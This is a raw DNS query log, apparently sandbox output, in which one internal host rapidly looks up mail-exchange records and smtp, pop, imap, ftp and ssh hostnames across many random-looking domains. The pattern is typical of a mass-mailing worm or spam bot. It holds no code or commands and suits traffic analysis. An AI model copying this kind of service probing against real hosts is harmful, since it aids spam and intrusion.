Nov 30, 2023 11:23:20.901439905 CET	192.168.2.4	1.1.1.1	0x25ca	Standard query (0)	igaacewo.ukc.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:20.928838968 CET	192.168.2.4	1.1.1.1	0x85ea	Standard query (0)	smtp.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.929552078 CET	192.168.2.4	1.1.1.1	0x681d	Standard query (0)	smtp.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.950335026 CET	192.168.2.4	1.1.1.1	0x38bf	Standard query (0)	pop3.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.950495958 CET	192.168.2.4	1.1.1.1	0xe8e9	Standard query (0)	smtp.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.960931063 CET	192.168.2.4	1.1.1.1	0xab	Standard query (0)	smtp.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.963996887 CET	192.168.2.4	1.1.1.1	0xd182	Standard query (0)	mailgate.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.967387915 CET	192.168.2.4	1.1.1.1	0xf265	Standard query (0)	igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.005918980 CET	192.168.2.4	1.1.1.1	0x4e7f	Standard query (0)	pop3.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.025991917 CET	192.168.2.4	1.1.1.1	0x1d50	Standard query (0)	mailgate.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.038453102 CET	192.168.2.4	1.1.1.1	0xa5b2	Standard query (0)	pop3.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.095518112 CET	192.168.2.4	1.1.1.1	0x4533	Standard query (0)	mailgate.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.153790951 CET	192.168.2.4	1.1.1.1	0x25ca	Standard query (0)	igaacewo.ukc.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.154270887 CET	192.168.2.4	1.1.1.1	0x5284	Standard query (0)	mailgate.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.257353067 CET	192.168.2.4	1.1.1.1	0x38bf	Standard query (0)	pop3.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.257441998 CET	192.168.2.4	1.1.1.1	0xf265	Standard query (0)	igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.271115065 CET	192.168.2.4	1.1.1.1	0x39e1	Standard query (0)	relay.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.354213953 CET	192.168.2.4	1.1.1.1	0x2d50	Standard query (0)	6eyaok.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.356365919 CET	192.168.2.4	1.1.1.1	0xff70	Standard query (0)	jmramdz9s8l.et	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.356695890 CET	192.168.2.4	1.1.1.1	0x8d20	Standard query (0)	md.coyar.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.358067989 CET	192.168.2.4	1.1.1.1	0x4e1a	Standard query (0)	hyeail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.395235062 CET	192.168.2.4	1.1.1.1	0xc0bd	Standard query (0)	ssh.ct.ated.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.461030960 CET	192.168.2.4	1.1.1.1	0x6f98	Standard query (0)	n.zcom	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.462852001 CET	192.168.2.4	1.1.1.1	0x859a	Standard query (0)	ssh.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.463392973 CET	192.168.2.4	1.1.1.1	0xbe35	Standard query (0)	ssh.96l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.463583946 CET	192.168.2.4	1.1.1.1	0xfb9f	Standard query (0)	ssh.m7l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.463788033 CET	192.168.2.4	1.1.1.1	0x7376	Standard query (0)	ssh.bjail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.463982105 CET	192.168.2.4	1.1.1.1	0x862e	Standard query (0)	ssh.6ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.464150906 CET	192.168.2.4	1.1.1.1	0x6ece	Standard query (0)	6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.493139982 CET	192.168.2.4	1.1.1.1	0xc84a	Standard query (0)	jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.493474960 CET	192.168.2.4	1.1.1.1	0xa0d9	Standard query (0)	md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.494877100 CET	192.168.2.4	1.1.1.1	0xf2b7	Standard query (0)	hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.533926010 CET	192.168.2.4	1.1.1.1	0x39e1	Standard query (0)	relay.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.541465998 CET	192.168.2.4	1.1.1.1	0xc079	Standard query (0)	n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.543170929 CET	192.168.2.4	1.1.1.1	0xf11b	Standard query (0)	ftp.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.565747976 CET	192.168.2.4	1.1.1.1	0x12f6	Standard query (0)	relay.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.575273991 CET	192.168.2.4	1.1.1.1	0xa0f3	Standard query (0)	relay.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.596915007 CET	192.168.2.4	1.1.1.1	0x347	Standard query (0)	ssh.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.626033068 CET	192.168.2.4	1.1.1.1	0xd5a0	Standard query (0)	relay.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.626256943 CET	192.168.2.4	1.1.1.1	0x935b	Standard query (0)	relay.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.638300896 CET	192.168.2.4	1.1.1.1	0xff70	Standard query (0)	jmramdz9s8l.et	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.638300896 CET	192.168.2.4	1.1.1.1	0xc0bd	Standard query (0)	ssh.ct.ated.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.640028954 CET	192.168.2.4	1.1.1.1	0xa134	Standard query (0)	dtianekicomail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.640223026 CET	192.168.2.4	1.1.1.1	0xd901	Standard query (0)	hi9tail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.678622007 CET	192.168.2.4	1.1.1.1	0xdfea	Standard query (0)	mail.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.725872040 CET	192.168.2.4	1.1.1.1	0x3266	Standard query (0)	dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.726767063 CET	192.168.2.4	1.1.1.1	0x6e37	Standard query (0)	hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.731323004 CET	192.168.2.4	1.1.1.1	0x449d	Standard query (0)	aal.netc	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.731323004 CET	192.168.2.4	1.1.1.1	0xa21f	Standard query (0)	hmsn.il.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.731323004 CET	192.168.2.4	1.1.1.1	0x8b54	Standard query (0)	il.cam	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.744787931 CET	192.168.2.4	1.1.1.1	0xc13c	Standard query (0)	mmoc.nnlgco.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.744787931 CET	192.168.2.4	1.1.1.1	0x454f	Standard query (0)	yah.o.com.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.746675968 CET	192.168.2.4	1.1.1.1	0xc84a	Standard query (0)	jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.749265909 CET	192.168.2.4	1.1.1.1	0xf3e7	Standard query (0)	gco.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.834146023 CET	192.168.2.4	1.1.1.1	0xd2f5	Standard query (0)	naburly26a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.834253073 CET	192.168.2.4	1.1.1.1	0x72c	Standard query (0)	aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.835223913 CET	192.168.2.4	1.1.1.1	0xf11b	Standard query (0)	ftp.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.835410118 CET	192.168.2.4	1.1.1.1	0x8de4	Standard query (0)	il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.835695028 CET	192.168.2.4	1.1.1.1	0xb50d	Standard query (0)	hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.838493109 CET	192.168.2.4	1.1.1.1	0x9cd1	Standard query (0)	yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.839207888 CET	192.168.2.4	1.1.1.1	0xe783	Standard query (0)	mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.849601984 CET	192.168.2.4	1.1.1.1	0xb0d0	Standard query (0)	ftp.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.849601984 CET	192.168.2.4	1.1.1.1	0x16f0	Standard query (0)	mail.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.856466055 CET	192.168.2.4	1.1.1.1	0x7755	Standard query (0)	ftp.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.857264996 CET	192.168.2.4	1.1.1.1	0x347	Standard query (0)	ssh.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.863236904 CET	192.168.2.4	1.1.1.1	0x7f07	Standard query (0)	aamail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.897192955 CET	192.168.2.4	1.1.1.1	0x96a5	Standard query (0)	hmam.comtmail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.902045965 CET	192.168.2.4	1.1.1.1	0xf067	Standard query (0)	qoil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.905246019 CET	192.168.2.4	1.1.1.1	0xd96c	Standard query (0)	otzaail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.905246019 CET	192.168.2.4	1.1.1.1	0xb4	Standard query (0)	ytgaig.tcueain.ch	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.907783031 CET	192.168.2.4	1.1.1.1	0x2a8e	Standard query (0)	sotuvhlp.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.907980919 CET	192.168.2.4	1.1.1.1	0xd195	Standard query (0)	yma4j.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.908754110 CET	192.168.2.4	1.1.1.1	0x3561	Standard query (0)	mail.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.916409016 CET	192.168.2.4	1.1.1.1	0x9291	Standard query (0)	mail.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.922755003 CET	192.168.2.4	1.1.1.1	0xe362	Standard query (0)	popss.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.922755003 CET	192.168.2.4	1.1.1.1	0x7f98	Standard query (0)	naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.962268114 CET	192.168.2.4	1.1.1.1	0x5c9a	Standard query (0)	ssh.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.962268114 CET	192.168.2.4	1.1.1.1	0x5d85	Standard query (0)	mail.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.964129925 CET	192.168.2.4	1.1.1.1	0xda6c	Standard query (0)	aamail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.966218948 CET	192.168.2.4	1.1.1.1	0xbef3	Standard query (0)	ssh.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.983340025 CET	192.168.2.4	1.1.1.1	0xf65d	Standard query (0)	hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.983340025 CET	192.168.2.4	1.1.1.1	0xdfea	Standard query (0)	mail.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.984762907 CET	192.168.2.4	1.1.1.1	0x3422	Standard query (0)	ftp.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.008533955 CET	192.168.2.4	1.1.1.1	0x94a8	Standard query (0)	qoil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.008533955 CET	192.168.2.4	1.1.1.1	0xfe98	Standard query (0)	otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.019551039 CET	192.168.2.4	1.1.1.1	0x7cef	Standard query (0)	yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.019551039 CET	192.168.2.4	1.1.1.1	0xbc3	Standard query (0)	sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.025264025 CET	192.168.2.4	1.1.1.1	0x73b1	Standard query (0)	popss.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.055238008 CET	192.168.2.4	1.1.1.1	0x839	Standard query (0)	ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.066273928 CET	192.168.2.4	1.1.1.1	0xeccb	Standard query (0)	ftp.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.070534945 CET	192.168.2.4	1.1.1.1	0xc178	Standard query (0)	ftp.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.139209032 CET	192.168.2.4	1.1.1.1	0x1962	Standard query (0)	ftp.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.177270889 CET	192.168.2.4	1.1.1.1	0x2a8e	Standard query (0)	sotuvhlp.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.177270889 CET	192.168.2.4	1.1.1.1	0xf067	Standard query (0)	qoil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.211559057 CET	192.168.2.4	1.1.1.1	0x96ef	Standard query (0)	mx1.aamail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.211559057 CET	192.168.2.4	1.1.1.1	0x765	Standard query (0)	mx192.m2bp.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.215877056 CET	192.168.2.4	1.1.1.1	0xd775	Standard query (0)	mail.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.218241930 CET	192.168.2.4	1.1.1.1	0x70c7	Standard query (0)	ssh.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.222398996 CET	192.168.2.4	1.1.1.1	0x3813	Standard query (0)	mail.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.222398996 CET	192.168.2.4	1.1.1.1	0xaa57	Standard query (0)	ssh.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.279220104 CET	192.168.2.4	1.1.1.1	0x94a8	Standard query (0)	qoil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.283262968 CET	192.168.2.4	1.1.1.1	0x1283	Standard query (0)	sell.sawbrokers.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.283262968 CET	192.168.2.4	1.1.1.1	0x3c4d	Standard query (0)	ssh.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.292711020 CET	192.168.2.4	1.1.1.1	0x2ce7	Standard query (0)	ftp.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.292711020 CET	192.168.2.4	1.1.1.1	0x90f2	Standard query (0)	mail.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.295284986 CET	192.168.2.4	1.1.1.1	0xa920	Standard query (0)	mail.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.296073914 CET	192.168.2.4	1.1.1.1	0x8504	Standard query (0)	pop.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.296997070 CET	192.168.2.4	1.1.1.1	0x86ae	Standard query (0)	ftp.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.298321962 CET	192.168.2.4	1.1.1.1	0xb360	Standard query (0)	mail.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.332657099 CET	192.168.2.4	1.1.1.1	0xc178	Standard query (0)	ftp.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.367378950 CET	192.168.2.4	1.1.1.1	0x345d	Standard query (0)	pop.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.376431942 CET	192.168.2.4	1.1.1.1	0x23b4	Standard query (0)	ssh.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.376431942 CET	192.168.2.4	1.1.1.1	0x22a3	Standard query (0)	mail.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.376960039 CET	192.168.2.4	1.1.1.1	0xdab	Standard query (0)	mail.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.378403902 CET	192.168.2.4	1.1.1.1	0x23df	Standard query (0)	ssh.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.398941994 CET	192.168.2.4	1.1.1.1	0x534	Standard query (0)	ftp.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.415412903 CET	192.168.2.4	1.1.1.1	0x411b	Standard query (0)	pop.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.415745974 CET	192.168.2.4	1.1.1.1	0xf388	Standard query (0)	pop.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.417357922 CET	192.168.2.4	1.1.1.1	0x957d	Standard query (0)	ftp.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.419800043 CET	192.168.2.4	1.1.1.1	0x4a45	Standard query (0)	pop.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.457875013 CET	192.168.2.4	1.1.1.1	0x533a	Standard query (0)	imap.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.460155010 CET	192.168.2.4	1.1.1.1	0x4d16	Standard query (0)	ssh.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.466222048 CET	192.168.2.4	1.1.1.1	0x25f9	Standard query (0)	mail.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.466279030 CET	192.168.2.4	1.1.1.1	0xaa57	Standard query (0)	ssh.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.466279030 CET	192.168.2.4	1.1.1.1	0x3813	Standard query (0)	mail.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.469409943 CET	192.168.2.4	1.1.1.1	0x8136	Standard query (0)	ftp.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.469409943 CET	192.168.2.4	1.1.1.1	0xe3f1	Standard query (0)	ftp.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.487220049 CET	192.168.2.4	1.1.1.1	0xc9f9	Standard query (0)	ftp.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.495841980 CET	192.168.2.4	1.1.1.1	0x5285	Standard query (0)	ftp.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.517262936 CET	192.168.2.4	1.1.1.1	0x2d72	Standard query (0)	mail.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.517262936 CET	192.168.2.4	1.1.1.1	0xc61b	Standard query (0)	imap.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.525788069 CET	192.168.2.4	1.1.1.1	0x204c	Standard query (0)	ftp.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.530046940 CET	192.168.2.4	1.1.1.1	0x2ce7	Standard query (0)	ftp.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.532109976 CET	192.168.2.4	1.1.1.1	0x1410	Standard query (0)	ftp.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.535219908 CET	192.168.2.4	1.1.1.1	0xa488	Standard query (0)	ftp.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.535219908 CET	192.168.2.4	1.1.1.1	0x82f3	Standard query (0)	ftp.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.546610117 CET	192.168.2.4	1.1.1.1	0xe196	Standard query (0)	ssh.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.546610117 CET	192.168.2.4	1.1.1.1	0x3c85	Standard query (0)	mail.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.547220945 CET	192.168.2.4	1.1.1.1	0x5ec5	Standard query (0)	imap.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.553720951 CET	192.168.2.4	1.1.1.1	0x6c52	Standard query (0)	ssh.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.603045940 CET	192.168.2.4	1.1.1.1	0x47e9	Standard query (0)	ssh.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.618016958 CET	192.168.2.4	1.1.1.1	0xb039	Standard query (0)	ssh.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.619041920 CET	192.168.2.4	1.1.1.1	0xc396	Standard query (0)	ssh.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.619894028 CET	192.168.2.4	1.1.1.1	0xf854	Standard query (0)	imap.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.620095968 CET	192.168.2.4	1.1.1.1	0x4944	Standard query (0)	ssh.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.623919010 CET	192.168.2.4	1.1.1.1	0xdb2e	Standard query (0)	mail.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.625433922 CET	192.168.2.4	1.1.1.1	0x6b27	Standard query (0)	mail.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.626981020 CET	192.168.2.4	1.1.1.1	0x1025	Standard query (0)	imap.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.638544083 CET	192.168.2.4	1.1.1.1	0x1228	Standard query (0)	mail.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.639751911 CET	192.168.2.4	1.1.1.1	0xdab	Standard query (0)	mail.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.677160025 CET	192.168.2.4	1.1.1.1	0x5337	Standard query (0)	mail.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.685508013 CET	192.168.2.4	1.1.1.1	0x4a45	Standard query (0)	pop.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.720452070 CET	192.168.2.4	1.1.1.1	0x9584	Standard query (0)	ssh.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.766508102 CET	192.168.2.4	1.1.1.1	0x3020	Standard query (0)	pop.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.767066002 CET	192.168.2.4	1.1.1.1	0x3690	Standard query (0)	pop.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.767566919 CET	192.168.2.4	1.1.1.1	0x33c4	Standard query (0)	pop3.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.768623114 CET	192.168.2.4	1.1.1.1	0xf7ee	Standard query (0)	pop.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.834634066 CET	192.168.2.4	1.1.1.1	0x6c52	Standard query (0)	ssh.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.838922024 CET	192.168.2.4	1.1.1.1	0x213e	Standard query (0)	ssh.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.868886948 CET	192.168.2.4	1.1.1.1	0x374a	Standard query (0)	imap.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.873797894 CET	192.168.2.4	1.1.1.1	0x4944	Standard query (0)	ssh.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.873866081 CET	192.168.2.4	1.1.1.1	0xf854	Standard query (0)	imap.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.874001026 CET	192.168.2.4	1.1.1.1	0xdb2e	Standard query (0)	mail.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.875560999 CET	192.168.2.4	1.1.1.1	0xe84c	Standard query (0)	pop3.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.943299055 CET	192.168.2.4	1.1.1.1	0x369a	Standard query (0)	pop3.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.943804979 CET	192.168.2.4	1.1.1.1	0x4f46	Standard query (0)	pop.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.943819046 CET	192.168.2.4	1.1.1.1	0x652f	Standard query (0)	pop.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.001488924 CET	192.168.2.4	1.1.1.1	0x278	Standard query (0)	ssh.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.002125978 CET	192.168.2.4	1.1.1.1	0x5dc3	Standard query (0)	ssh.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.009159088 CET	192.168.2.4	1.1.1.1	0x211d	Standard query (0)	imap.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.009402037 CET	192.168.2.4	1.1.1.1	0x1f5d	Standard query (0)	imap.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.024025917 CET	192.168.2.4	1.1.1.1	0xfae2	Standard query (0)	imap.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.077001095 CET	192.168.2.4	1.1.1.1	0x213e	Standard query (0)	ssh.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.082410097 CET	192.168.2.4	1.1.1.1	0xfa21	Standard query (0)	imap.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.096138000 CET	192.168.2.4	1.1.1.1	0xe074	Standard query (0)	pop.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.096297979 CET	192.168.2.4	1.1.1.1	0x94b8	Standard query (0)	pop.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.098373890 CET	192.168.2.4	1.1.1.1	0x6e5b	Standard query (0)	smtp.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.104530096 CET	192.168.2.4	1.1.1.1	0x3682	Standard query (0)	pop3.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.105011940 CET	192.168.2.4	1.1.1.1	0x932	Standard query (0)	pop.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.106929064 CET	192.168.2.4	1.1.1.1	0xb64c	Standard query (0)	pop.hmsn.il.com	A (IP address)	IN (0x0001)	false
